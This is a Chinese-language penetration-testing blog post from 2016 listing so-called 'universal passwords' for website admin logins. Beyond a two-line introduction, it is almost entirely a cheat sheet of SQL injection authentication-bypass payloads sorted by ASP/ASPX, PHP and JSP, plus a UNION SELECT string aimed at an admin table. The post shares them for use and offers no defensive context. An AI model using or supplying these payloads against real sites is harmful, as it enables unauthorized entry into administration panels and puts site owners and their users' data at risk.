欢迎来到【血梦博客】 今天是:2020年10月23日 星期五
站长联系QQ:635948183
当前位置: 网站首页> 渗透测试> 网站后台登陆万能密码

网站后台登陆万能密码

作者:血梦 日期:2016-07-25 浏览:9866分类: 渗透测试 已提交百度收录

所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。
分享给大家、、 希望对大家有所帮助!

各种脚本的万能密码
优先级:NOT > AND > OR

导致注入漏洞可以饶过sql判断语句,直接进入后台

ASP ASPX万能密码

1:"or "a"="a

2: ')or('a'='a

3:or 1=1--

4:'or 1=1--

5:a'or' 1=1--

6:"or 1=1--

7:'or'a'='a

8:"or"="a'='a

9:'or''='

10:'or'='or'

11: 1 or '1'='1'=1

12: 1 or '1'='1' or 1=1

13: 'OR 1=1%00

14: "or 1=1%00

15: 'xor

16:用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin) 密码 1


PHP万能密码

'or 1=1/*
admin'/*
密码*/'

admin'or 1=1#

jsp 万能密码

1'or'1'='1


登陆框密码构造:

admin' or 1=1-- 

'or 1=1/*

"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--

关灯